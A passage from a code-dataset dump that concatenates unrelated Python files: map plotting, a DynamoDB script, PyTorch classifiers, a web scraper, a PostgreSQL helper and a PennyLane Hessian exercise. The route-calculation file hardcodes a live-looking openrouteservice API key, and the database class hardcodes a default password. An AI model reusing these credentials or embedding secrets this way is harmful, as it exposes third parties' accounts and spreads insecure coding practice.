stroke_color is None:\n stroke_color = color\n if stroke_opacity is None:\n stroke_opacity = opacity\n\n self.add_object({\n 'type': 'Circle',\n 'center': _coordinates(center),\n 'radius': radius,\n 'hint': hint,\n 'content': content,\n 'fill': fill,\n 'fillColor': fill_color,\n 'fillOpacity': fill_opacity,\n 'strokeColor': stroke_color,\n 'strokeOpacity': stroke_opacity\n })\n\n def add_polygon(\n self,\n points_outer,\n points_inner=None,\n hint=None,\n content=None,\n fill=True,\n color='#000000',\n opacity=0.5,\n width=1.0,\n fill_color=None,\n fill_opacity=None,\n stroke_color=None,\n stroke_opacity=None\n ):\n if fill_color is None:\n fill_color = color\n if fill_opacity is None:\n fill_opacity = opacity\n if stroke_color is None:\n stroke_color = color\n if stroke_opacity is None:\n stroke_opacity = opacity\n\n obj = {\n 'type': 'Polygon',\n 'pointsOuter': _coordinates_many(points_outer),\n 'hint': hint,\n 'content': content,\n 'fill': fill,\n 'fillColor': fill_color,\n 'fillOpacity': fill_opacity,\n 'strokeColor': stroke_color,\n 'strokeOpacity': stroke_opacity\n }\n\n if points_inner is not None:\n obj['pointsInner'] = _coordinates_many(points_inner)\n\n self.add_object(obj)\n\n def to_dict(self):\n \"\"\"\n Outputs JSON-serializable dictionary representation of the map plot.\n \"\"\"\n return {\n 'state': {\n 'center': self.center,\n 'zoom': self.zoom,\n },\n 'objects': self.objects,\n 'showClickCoords': self.show_click_coords\n }\n\n def to_html(self, *args, **kwargs):\n return map_to_html(self, *args, **kwargs)\n\n def display(self, *args, **kwargs):\n display(HTML(self.to_html(*args, **kwargs)))\n\n def save_html(self, file, *args, **kwargs):\n if isinstance(file, str):\n with open(file, 'w') as f:\n self.save_html(f, *args, **kwargs)\n else:\n file.write(standalone_html(self.to_html(*args, **kwargs)))\n","sub_path":"pygeoplot/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"443936096","text":"#Script para criar uma tabela no DynamoDB\n\nfrom __future__ import print_function\n\nimport os.path\nimport json\nimport sys\nimport botocore.session\nimport boto3\n\nimport modules.utils as utils\n\ndef createTable():\n print('> Iniciando operação create_table')\n filename = sys.argv[2] if len(sys.argv) > 2 else 'database\\\\table.json' \n if os.path.isfile(filename):\n print('> Lendo arquivo json')\n with open(filename) as file:\n obj = file.read()\n data = json.loads(obj)\n file.close()\n else:\n print('> Arquivo não encontrado')\n\n print('> Criando tabela')\n session = botocore.session.get_session()\n dynamodb = session.create_client('dynamodb', region_name=utils.getRegion(sys.argv[1]))\n table = dynamodb.create_table(**data)\n waiter = dynamodb.get_waiter('table_exists')\n waiter.wait(TableName=data['TableName'])\n print('> Operação finalizada')\n\nif __name__ == \"__main__\":\n if utils.areYouSure(sys.argv[1]):\n utils.summary()\n createTable()","sub_path":"create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"640648432","text":"import cgi\nimport cgitb\nimport urllib\n\nfrom google.appengine.ext import ndb\nfrom webapp2_extras.appengine.users import login_required, admin_required\nfrom google.appengine.api import users\nimport webapp2\nfrom import_export import ImportHandler, ExportHandler\n\nimport json\nfrom models 
import Student\nfrom tmpl import BaseHandler\n\n# Data structure: Student Data\nclass studentData(ndb.Model):\n\tname = ndb.StringProperty(indexed=True)\n\tnumLaps = ndb.IntegerProperty()\n\tteacherName = ndb.StringProperty(indexed=False)\n\tteacherName_lower = ndb.ComputedProperty(lambda self: self.teacherName.lower())\n\tbarcodeID = ndb.IntegerProperty()\n\nclass MainPage(BaseHandler):\n\t@admin_required\n\tdef get(self):\n\t\tself.render('html/index.html', {})\n\t\t\nclass LapTrackerHandler(BaseHandler):\n\t@admin_required\n\tdef get(self):\n\t\tself.render('html/tracker.html', {})\n\nclass TeacherNameHandler(webapp2.RequestHandler):\n\t@admin_required\n\tdef get(self):\n\t\tself.response.out.write(json.dumps(['Radle', 'Kumar']))\n\nclass StudentNameHandler(webapp2.RequestHandler):\n\t@admin_required\n\tdef get(self):\n\t\tstudents = list(Student.query(Student.teacher==self.request.get('teacher')))\n\t\tself.response.out.write(json.dumps([s.to_dict() for s in students]))\n\n\t\t\n# assigns a web address to a handler\napplication = webapp2.WSGIApplication([\n\t('/', MainPage),\n\t('/import', ImportHandler),\n\t('/export', ExportHandler),\n\t('/track', LapTrackerHandler),\n\t('/teacher_names', TeacherNameHandler),\n\t('/student_names', StudentNameHandler),\n], debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"327103011","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 16:49:05 2017\n\n@author: eric\n\"\"\"\nfrom selenium import webdriver\n\n# Save a screenshot from www.nu.nl to current directory\n\nDRIVER = 'chromedriver'\ndriver = webdriver.Chrome(DRIVER)\n\ndriver.maximize_window()\ndriver.get('http://www.nu.nl')\nscreenshot = driver.save_screenshot('my_screenshot.png')\ndriver.quit()","sub_path":"webpage.py","file_name":"webpage.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"591255789","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# mall_jd.py\r\n# @Author : PengYingZhi\r\n# @Date : 2018-3-10 17:03:29\r\n\r\nimport cv2 as cv\r\n\r\nfrom goldeye.preprocessing.binaryzation import binary\r\nfrom goldeye.preprocessing.clear import clear_noise_by_neighbor\r\nfrom goldeye.preprocessing.cut import projection_extremum_split\r\n\r\n\r\ndef preprocess(image):\r\n \"\"\"\r\n 预处理流程\r\n\r\n Params:\r\n * image: (array) - numpy数组\r\n\r\n Returns:\r\n * childs: (list) - 切分后的用于预测的子图\r\n \"\"\"\r\n image = binary(image, thresh=180)\r\n image = clear_noise_by_neighbor(\r\n image=image, thresh=5)\r\n childs = [\r\n image[:, pair[0]:pair[1]]\r\n for pair in projection_extremum_split(image, window=8)\r\n ]\r\n childs = [\r\n cv.resize(child, (20, 15)) for child in childs\r\n ]\r\n return childs\r\n","sub_path":"goldeye/models/mall_jd.py","file_name":"mall_jd.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"640252986","text":"import os\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms, models\n\n\n# copy-pasta from https://pytorch.org/vision/stable/_modules/torchvision/models/inception.html#inception_v3\nclass BasicConv2d(nn.Module):\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n 
**kwargs\n    ) -> None:\n        super(BasicConv2d, self).__init__()\n        self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n        self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n    def forward(self, x):\n        x = self.conv(x)\n        x = self.bn(x)\n        return F.relu(x, inplace=True)\n\nclass InceptionModel(nn.Module):\n\n    def __init__(self, num_classes):\n        super(InceptionModel, self).__init__()\n        self.inception = models.inception_v3(\n            num_classes=num_classes,\n            aux_logits=False,\n            transform_input=False,\n            pretrained=False,\n            progress=False\n        )\n        # modify to deal with 1-channel inputs as we have grayscale images\n        self.inception.Conv2d_1a_3x3 = BasicConv2d(1, 32, kernel_size=3, stride=1)\n\n    def forward(self,img):\n        x = self.inception(img)\n        # return F.log_softmax(x, dim=1) # for nll_loss\n        return x # for CrossEntropyLoss\n        # expl. see here: https://stackoverflow.com/a/65193236/9920677\n\nclass GoogleNetModel(nn.Module):\n\n    def __init__(self, num_classes):\n        super(GoogleNetModel, self).__init__()\n        self.googlenet = models.googlenet(\n            num_classes=num_classes,\n            aux_logits=False,\n            transform_input=False,\n            pretrained=False,\n            progress=False\n        )\n        # modify to deal with 1-channel inputs as we have grayscale images\n        self.googlenet.conv1 = BasicConv2d(1, 64, kernel_size=7, stride=2, padding=3)\n\n    def forward(self,img):\n        return self.googlenet(img)\n\nif __name__ == \"__main__\":\n\n    from torchsummary import summary\n    import json\n\n    NUM_CLASSES = len(json.load(open(\"glyph_dict.json\")))\n\n    # initialize model\n    model = GoogleNetModel(num_classes=NUM_CLASSES)\n    summary(model, (1, 224,224)) # but we have (1, 101, 101)!\n","sub_path":"ocr/classifier/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"244340828","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport random\nfrom torch.utils.data import DataLoader\nfrom dataloader import IEMOCAPDataset\nfrom model import DialogueRNN, MaskedNLLLoss\nfrom sklearn.metrics import accuracy_score\n\n# mask\n\ndef get_IEMOCAP_loaders(path, batch_size=32, num_workers=0):\n    trainset = IEMOCAPDataset(path=path)\n    testset = IEMOCAPDataset(path=path, train=False)\n    train_loader = DataLoader(trainset, batch_size=batch_size, collate_fn=trainset.collate_fn, num_workers=num_workers)\n    test_loader = DataLoader(testset, batch_size=batch_size, collate_fn=testset.collate_fn, num_workers=num_workers)\n    return train_loader, test_loader\n\nif __name__ == '__main__':\n    random.seed(53113)\n    np.random.seed(53113)\n    torch.manual_seed(53113)\n\n    BATCH_SIZE = 32\n    path = './IEMOCAP_features/IEMOCAP_features_raw.pkl'\n    epochs = 10\n    train_loader, test_loader = get_IEMOCAP_loaders(path, batch_size=BATCH_SIZE)\n    D_m = 100\n    D_g = 150 # output vector dimension of the global GRU\n    D_p = 150\n    D_e = 100\n    D_l = 100\n    D_c = 6\n    learning_rate = 0.01\n    model = DialogueRNN(D_m, D_g, D_p, D_e, D_l, D_c)\n    # loss_fn = MaskedNLLLoss() # would also need to change pred's dimensions; look into why target is not multiplied by mask_\n    loss_fn = nn.CrossEntropyLoss()\n    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=0.00001)\n\n    for e in range(20):\n        # training\n        model.train()\n        # After fetching the data, the three feature sets could be concatenated and passed to the model, but the original code only passes the text features; not sure why\n        for i, (videoText, videoVisual, videoAudio,\n                videoSpeakers, s, videoLabels, vid) in enumerate(train_loader):\n            optimizer.zero_grad()\n            loss, pred_y = model(videoText, videoLabels)\n            # print(\"videoText\", videoText.shape[0] * videoText.shape[1])\n            # total number of utterances in this batch\n            u_count = videoText.shape[0] * videoText.shape[1]\n            loss /= (u_count)\n            # labels original shape: batch_size, seq_len; training runs batch-first then seq, so transpose and flatten row-wise into a 1-D array\n            labels = videoLabels.transpose(0, 1).reshape(u_count)\n            # print(\"pred_y shape\", pred_y.shape)\n            # print(\"labels count\", videoLabels.shape[0] * videoLabels.shape[1])\n            # print(\"labels.shape \", labels.shape)\n            loss.backward()\n            optimizer.step()\n            train_acc = accuracy_score(labels.long(), pred_y)\n            if e == 9:\n                print(pred_y[:30])\n                print(labels[:30])\n            print(\"epoch :\", e, \" train loss :\", loss, \"train acc :\", train_acc)\n        # Problem: after the first g_hist concatenation, the scaler computation in simple attention goes wrong, probably a dimension mix-up; consider adding batch_first=True to the GRUCell so batch_size comes first\n        # Question: DialogueRNN treats one dialogue as a unit, i.e. the time sequence is confined to one dialogue, so why are the sentences in the dataset not split per dialogue instead of using a fixed batch size of 32?\n        # Does a batch of 32 mean 32 dialogues? If one dialogue has length 87 and is the longest of the 32, the shorter dialogues need padding\n        # The dataloader yields 87 * 32 * 150 videoText, which should mean 32 dialogues of 87 sentences each, some of them padded (i.e. real length below 87 sentences)\n\n        # testing\n        model.eval()\n        for i, (videoText, videoVisual, videoAudio,\n                videoSpeakers, s, videoLabels, vid) in enumerate(test_loader):\n            loss, pred_y = model(videoText, videoLabels)\n            # total number of utterances in this batch\n            u_count = videoText.shape[0] * videoText.shape[1]\n            loss /= (u_count)\n            # labels original shape: batch_size, seq_len; training runs batch-first then seq, so transpose and flatten row-wise into a 1-D array\n            labels = videoLabels.transpose(0, 1).reshape(u_count)\n            test_acc = accuracy_score(labels.long(), pred_y)\n            print(\"epoch :\", e, \" test loss :\", loss, \"test acc :\", test_acc)","sub_path":"train_test_noMask.py","file_name":"train_test_noMask.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"110720624","text":"\ndef calc(source,destination):\n    from openrouteservice import convert\n    import openrouteservice as ors\n    import folium \n    import osmnx as ox\n    from simplification.cutil import simplify_coords\n\n    client = ors.Client(key='5b3ce3597851110001cf6248f7fc2435c8db4769a07ea6d7284e0477')\n\n    origin=list(source)\n    dest=list(destination)\n\n    origin.reverse()\n    dest.reverse()\n\n    coordinates = [origin,dest]\n\n    route_fast = client.directions(\n        coordinates=coordinates,\n        profile=\"driving-car\",\n        format='geojson',\n        preference=\"fastest\",\n        units='km',\n        validate=False,\n    )\n    route_fast_polyline = client.directions(\n        coordinates=coordinates,\n        profile=\"driving-car\",\n        format='json',\n        preference=\"fastest\",\n        validate=False,\n)\n    distance = route_fast['features'][0]['properties']['segments'][0]['distance']\n    geometry=route_fast_polyline['routes'][0]['geometry']\n    \n    decoded = convert.decode_polyline(geometry,False)\n    #print(\"original length\",len(decoded['coordinates']))\n    simplified = simplify_coords(decoded['coordinates'], 0.07)\n    #print(\"simplified=\",str(len(simplified)))\n\n    decoded['coordinates']=[list(reversed(coord)) \n                            for coord in simplified]\n\n    return distance,decoded\n","sub_path":"city/dist_calc.py","file_name":"dist_calc.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"413412511","text":"\n\nfrom xai.brain.wordbase.nouns._enmity import _ENMITY\n\n#class header\nclass _ENMITIES(_ENMITY, ):\n\tdef __init__(self,): \n\t\t_ENMITY.__init__(self)\n\t\tself.name = \"ENMITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"enmity\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_enmities.py","file_name":"_enmities.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"560291660","text":"import requests\nfrom bs4 import BeautifulSoup\n\nmy_url = \"https://movie.naver.com/movie/running/current.nhn\"\nresponse = requests.get(my_url)\nsoup = BeautifulSoup(response.text, 'html.parser')\n\nmovies_section = soup.select('#content > div.article > div:nth-child(1) > div.lst_wrap > ul > li')\nmovie_list =[]\nfor movie in movies_section:\n title = movie.select_one('dl > dt > a')\n movie_info ={\n 'title' : title.text,'code' : title['href'].split('=')[1]\n }\n movie_list.append(movie_info)\n # movie_list[title.text] = title['href'].split('=')[1]\n\n# iframe 때문에안됨 \n# for movie in movie_list:\n# movie_code = movie['code']\n# review_url = f'https://movie.naver.com/movie/bi/mi/point.nhn?code={movie_code}'\n# review_response = requests.get(review_url)\n# review_soup2 = BeautifulSoup(review_response.text, 'html.parser')\n# review_section = soup.select('body > div > div > div.score_result > ul > li')\n\n\nreview_section_list=[]\nfor movie in movie_list:\n movie_code = movie['code']\n params = (\n ('code', movie_code),\n ('type', 'after'),\n ('isActualPointWriteExecute', 'false'),\n ('isMileageSubscriptionAlready', 'false'),\n ('isMileageSubscriptionReject', 'false'),\n )\n # headers = {\n # 'authority': 'movie.naver.com',\n # 'upgrade-insecure-requests': '1',\n # 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36',\n # 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n # 'sec-fetch-site': 'same-origin',\n # 'sec-fetch-mode': 'navigate',\n # 'sec-fetch-dest': 'iframe',\n # 'referer': f'https://movie.naver.com/movie/bi/mi/point.nhn?code={movie_code}',\n # 'accept-language': 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6,zh;q=0.5,ja;q=0.4',\n # }\n \n review_response = requests.get('https://movie.naver.com/movie/bi/mi/pointWriteFormList.nhn', params=params)\n review_soup2 = BeautifulSoup(review_response.text, 'html.parser')\n review_list = review_soup2.select('body > div > div > div.score_result > ul > li')\n j = 0\n for review in review_list:\n score = ''\n reple = ''\n score =review.select_one('div.star_score > em').text\n if review.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}] > span[id=_unfiold_ment{j}]'):\n reple =review.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}] > span > a')['data-src']\n else:\n reple =review.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}]').text.strip()\n print(score,reple)\n j += 1\n\n # review_section_list.append(review_section)\n\n# for review in review_section_list:\n# j=0\n\n# for i in review:\n# title = i.select_one(f'div.score_reple > p > span[id=_filtered_ment_{j}]')\n# if title:\n# print(title.text)\n# j += 1\n \n \n","sub_path":"movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"291617615","text":"import psycopg2\nfrom psycopg2 import OperationalError\nfrom decimal import Decimal\n\n\nclass Database:\n\n def __init__(self,db_name=\"libbot\", db_user=\"shakakanenobu\", db_password=\"iFaceYellow\", db_host=\"localhost\", db_port=5432):\n self.db_name = db_name\n self.db_user 
= db_user\n self.db_password = db_password\n self.db_host = db_host\n self.db_port = db_port\n self.connection = None\n\n\n #Every method will automatically call to this for user\n def create_connection(self):\n # print(\"Parameters are: \",db_name,db_user,db_password,db_host,db_port)\n try:\n self.connection = psycopg2.connect(\n database = self.db_name,\n user = self.db_user,\n password = self.db_password,\n host = self.db_host,\n port = self.db_port,\n )\n # cursor = self.connection.cursor()\n print(\"Connection to PostgreSQL DB successful\")\n except OperationalError as e:\n print(f\"The error '{e}' occurred\")\n # return connection\n \n def close_connection(self):\n self.connection.close()\n\n\n def new_user(self, username):\n sql_students = \"\"\"INSERT INTO students(username) VALUES(%s) RETURNING id;\"\"\"\n sql_error_stats = \"INSERT INTO error_stats(student_id) VALUES(%s) RETURNING id;\"\n # connection = None\n id = None\n try:\n # connection = create_connection()\n cursor = self.connection.cursor()\n cursor.execute(sql_students,(username,))\n id_student = cursor.fetchone()[0]\n cursor.execute(sql_error_stats,(id_student,))\n id_stats = cursor.fetchone()[0]\n self.connection.commit()\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return id_student, id_stats\n \n def get_student_id(self, username):\n sql = \"\"\"SELECT id FROM students WHERE username = %s;\"\"\"\n id = None\n try:\n cursor = self.connection.cursor()\n cursor.execute(sql,(username,))\n id = cursor.fetchone()\n print(\"User\", username, \"has id of\", id[0])\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if id is not None:\n return id[0]\n\n\n\n def get_reliability(self,id):\n sql = \"\"\"SELECT reliability FROM error_stats WHERE student_id = %s;\"\"\"\n reliability = None\n try:\n # connection = create_connection()\n cursor = self.connection.cursor()\n cursor.execute(sql,(id,))\n reliability = cursor.fetchone()\n print(\"RELIABILITY IS: \", float(reliability[0]))\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if reliability is not None:\n return reliability[0]\n # finally:\n # if connection is not None:\n # connection.close()\n\n #Finds an exponential moving average of the reliability of users\n def new_reliability(self, ema_minus_one, success, a = 1/6):\n ema = 1 if success else 0\n if ema_minus_one is not None:\n print(\"EMA IS:\",ema)\n ema = a * ema + (1 - a) * ema_minus_one\n return ema\n\n\n def update_stats(self,id,success):\n \n sql_success = \"\"\"UPDATE error_stats \n SET num_tried = num_tried + 1, num_success = num_success + 1, \n last_ran = DATE_TRUNC('second', NOW()::TIMESTAMP), reliability = %s \n WHERE student_id = %s\"\"\"\n sql_fail = \"\"\"UPDATE error_stats \n SET num_tried = num_tried + 1, \n last_ran = DATE_TRUNC('seconds',NOW()::TIMESTAMP), \n last_failed = DATE_TRUNC('seconds',NOW()::TIMESTAMP), reliability = %s \n WHERE student_id = %s\"\"\"\n # connection = None\n updated_rows = 0\n r = self.get_reliability(id)\n if r is not None:\n r = float(r)\n r = self.new_reliability(r, success)\n try:\n # connection = create_connection()\n cursor = self.connection.cursor()\n if success:\n cursor.execute(sql_success,(r,id))\n else:\n cursor.execute(sql_fail,(r,id))\n updated_rows = cursor.rowcount\n self.connection.commit()\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n # finally:\n # if connection is not None:\n # 
connection.close()\n return updated_rows\n\n\n\n\n\n\n def connect(self):\n try:\n # print(\"Trying to connect\")\n connection = create_connection()\n # print(\"trying to create cursor\")\n cursor = connection.cursor()\n print('PostgreSQL database version:')\n cursor.execute('SELECT version()')\n db_version = cursor.fetchone()\n print(db_version)\n cursor.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if connection is not None:\n connection.close()\n print('Database connection closed')\n\n\n\n def execute_query(connection, query):\n connection.autocommit = True\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n print(\"Query executed successfully\")\n except OperationalError as e:\n print(f\"The error {e} occured\")\n \n# if __name__ == '__main__':\n# connect()","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"156835390","text":"# encoding=utf-8\nimport pdb\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom loss import DiscCentroidsLoss\nfrom .MetaEmbeddingClassifier import MetaEmbedding_Classifier\nimport torch.nn.functional as F\n\nfrom .resnest import resnest101, resnest200\n\nclasses = 50030\n\narch_dict = {\n 'MetaEmbedding': resnest101,\n}\n\n\nclass NoModule(nn.Module):\n def __init__(self):\n super(NoModule, self).__init__()\n\n def forward(self, x):\n return x\n\n\nclass DirectFeature(nn.Module):\n def __init__(self, arch):\n super(DirectFeature, self).__init__()\n self.network = arch_dict[arch](pretrained=True)\n # pdb.set_trace()\n self.num_ftrs = self.network.fc.in_features\n self.network.fc = NoModule() # Direct Feature没有fc了\n\n def forward(self, input):\n x = input\n y = self.network(x)\n return y\n\n def get_feature_num(self):\n return self.num_ftrs\n\n\nclass Classifier(nn.Module):\n def __init__(self, num_features):\n super(Classifier, self).__init__()\n self.fc = nn.Linear(num_features, classes)\n\n def forward(self, input):\n return self.fc(input)\n\n\nclass MetaEmbedding(nn.Module):\n\n def __init__(self, feat_dim=2048, num_classes=1000):\n super(MetaEmbedding, self).__init__()\n self.num_classes = num_classes\n self.fc_hallucinator = nn.Linear(feat_dim, num_classes)\n self.fc_selector = nn.Linear(feat_dim, feat_dim)\n self.classifier = Classifier(feat_dim)\n\n def forward(self, x, centroids, *args):\n # storing direct feature\n direct_feature = x.clone()\n\n batch_size = x.size(0)\n feat_size = x.size(1)\n\n # set up visual memory\n x_expand = x.clone().unsqueeze(1).expand(-1, self.num_classes, -1)\n centroids_expand = centroids.clone().unsqueeze(0).expand(batch_size, -1, -1)\n keys_memory = centroids.clone()\n\n # computing reachability\n dist_cur = torch.norm(x_expand - centroids_expand, 2, 2)\n values_nn, labels_nn = torch.sort(dist_cur, 1)\n scale = 10.0\n reachability = (scale / values_nn[:, 0]).unsqueeze(1).expand(-1, feat_size)\n\n # computing memory feature by querying and associating visual memory\n values_memory = self.fc_hallucinator(x.clone())\n values_memory = values_memory.softmax(dim=1)\n memory_feature = torch.matmul(values_memory, keys_memory)\n\n # computing concept selector\n concept_selector = self.fc_selector(x.clone())\n concept_selector = concept_selector.tanh()\n x = reachability * (direct_feature + concept_selector * memory_feature)\n\n # storing infused feature\n infused_feature = concept_selector * memory_feature\n\n logits = 
self.classifier(x)\n\n return logits, [direct_feature, infused_feature]\n\n\n\n# class Classifier(nn.Module):\n# def __init__(self, arch):\n# super(Classifier, self).__init__()\n# self.network = arch_dict[arch](pretrained=True)\n# # pdb.set_trace()\n# self.disc_loss = DiscCentroidsLoss(num_classes=classes, feat_dim=self.network.fc.in_features)\n#\n# num_ftrs = self.network.fc.in_features\n# # self.networks['classifier'](self.features, self.centroids)\n# self.clf = MetaEmbedding_Classifier(feat_dim=num_ftrs, num_classes=classes)\n# self.centroids = self.disc_loss.centroids.data if self.training else None\n#\n# self.network._modules.pop('fc')\n# \"\"\"\n# self.clf.fc_hallucinator = init_weights(model=self.clf.fc_hallucinator,\n# weights_path='./logs/%s/stage1/final_model_checkpoint.pth' % dataset,\n# classifier=True)\n# \"\"\"\n#\n# # self.network.fc = self.clf.fc_hallucinator\n#\n# def forward(self, input, centroids):\n# x = self.network(input)\n#\n# y = self.clf(x, centroids)\n#\n# return y # logits, [direct_feature, infused_feature]\n\n\n\n\n# a = Classifier()\n# img = torch.randn([1, 3, 256, 256])\n# a(img)\n","sub_path":"network/MetaEmbedding/meta_embedding.py","file_name":"meta_embedding.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"449264101","text":"#! /usr/bin/python3\n\nimport sys\nimport pennylane as qml\nimport numpy as np\n\n\ndef gradient_200(weights, dev):\n r\"\"\"This function must compute the gradient *and* the Hessian of the variational\n circuit using the parameter-shift rule, using exactly 51 device executions.\n The code you write for this challenge should be completely contained within\n this function between the # QHACK # comment markers.\n\n Args:\n weights (array): An array of floating-point numbers with size (5,).\n dev (Device): a PennyLane device for quantum circuit execution.\n\n Returns:\n tuple[array, array]: This function returns a tuple (gradient, hessian).\n\n * gradient is a real NumPy array of size (5,).\n\n * hessian is a real NumPy array of size (5, 5).\n \"\"\"\n\n @qml.qnode(dev, interface=None)\n def circuit(w):\n for i in range(3):\n qml.RX(w[i], wires=i)\n\n qml.CNOT(wires=[0, 1])\n qml.CNOT(wires=[1, 2])\n qml.CNOT(wires=[2, 0])\n\n qml.RY(w[3], wires=1)\n\n qml.CNOT(wires=[0, 1])\n qml.CNOT(wires=[1, 2])\n qml.CNOT(wires=[2, 0])\n\n qml.RX(w[4], wires=2)\n\n return qml.expval(qml.PauliZ(0) @ qml.PauliZ(2))\n\n gradient = np.zeros([5], dtype=np.float64)\n hessian = np.zeros([5, 5], dtype=np.float64)\n\n # QHACK #\n shift_value = np.pi/4\n\n def parameter_shift_term(circuit, weights, i):\n shifted = weights.copy()\n shifted[i] += shift_value * 2\n forward = circuit(shifted) # forward evaluation\n\n shifted[i] -= 2 * shift_value * 2\n backward = circuit(shifted) # backward evaluation\n\n return 0.5 * (forward - backward) / np.sin(shift_value*2), forward, backward\n \n forwards = np.zeros(5)\n backwards = np.zeros(5)\n for i in range(5):\n gradient[i], forwards[i], backwards[i] = parameter_shift_term(circuit, weights, i)\n \n def shift_vector(i):\n vector = np.zeros(5)\n vector[i] = 1\n return vector\n \n circuit_unshifted = circuit(weights)\n \n def evaluate_circuit(shifts):\n if np.any(shifts != 0) and np.all(shifts != 2*np.pi):\n return circuit(weights + shifts)\n return circuit_unshifted\n \n for i in range(5):\n for j in range(i+1):\n i_shift = shift_value * shift_vector(i)\n j_shift = shift_value * shift_vector(j)\n\n if i == j:\n hessian[i, 
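The reachability term in MetaEmbedding.forward above is simply scale / d_min, the inverse distance to the nearest class centroid. A compact equivalent of that step using torch.cdist instead of the expand-and-norm pattern (tensor sizes here are hypothetical, not from the source):

import torch

x = torch.randn(4, 8)            # batch of direct features
centroids = torch.randn(10, 8)   # one centroid per class
dist = torch.cdist(x, centroids)             # (4, 10) pairwise L2 distances
d_min = dist.min(dim=1).values               # distance to the closest centroid
reachability = (10.0 / d_min).unsqueeze(1)   # broadcasts over the feature dim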
i] = 0.25 * (\n forwards[i] + backwards[i] - 2 * circuit_unshifted\n ) / np.sin(shift_value)**2\n\n else:\n hessian[i, j] = 0.25 * (\n evaluate_circuit(i_shift + j_shift)\n - evaluate_circuit(i_shift - j_shift)\n - evaluate_circuit(-i_shift + j_shift)\n + evaluate_circuit(-i_shift - j_shift)\n ) / np.sin(shift_value)**2\n \n hessian[j, i] = hessian[i, j]\n # QHACK #\n\n return gradient, hessian, circuit.diff_options[\"method\"]\n\n\nif __name__ == \"__main__\":\n # DO NOT MODIFY anything in this code block\n weights = sys.stdin.read()\n weights = weights.split(\",\")\n weights = np.array(weights, float)\n\n dev = qml.device(\"default.qubit\", wires=3)\n gradient, hessian, diff_method = gradient_200(weights, dev)\n\n print(\n *np.round(gradient, 10),\n *np.round(hessian.flatten(), 10),\n dev.num_executions,\n diff_method,\n sep=\",\"\n )\n","sub_path":"QML_Challenges/quantum_gradients_200_template/quantum_gradients_200_template.py","file_name":"quantum_gradients_200_template.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191446536","text":"import numpy as np\n\ni=0\ndata=open('TFMC_pilot_9tapes_mesh_shorter_HTS_leads1.mesh', 'rt')\nnew_mesh=[]\nelement_num=0\nbdr_num=0\nfor x in data:\n new_mesh.append(x)\n if x=='elements\\n':\n element_num = i+2\n if x=='boundary\\n':\n bdr_num = i+2 \n i=i+1\n if i==4000000:\n break\n\nprint('element_number=',element_num)\nprint('boundary_number=',bdr_num)\n#for element in mymeh:\n# print(element) \n\n\n\n#print(new_mesh[bdr_num-3])\n#bdr_num-2\n#element_num\nflag = 0\nk=0\nfor j in range(element_num, element_num+20):\n i=0\n #print(new_mesh[j])\n for ch in new_mesh[j]: \n if ch==' ':\n if 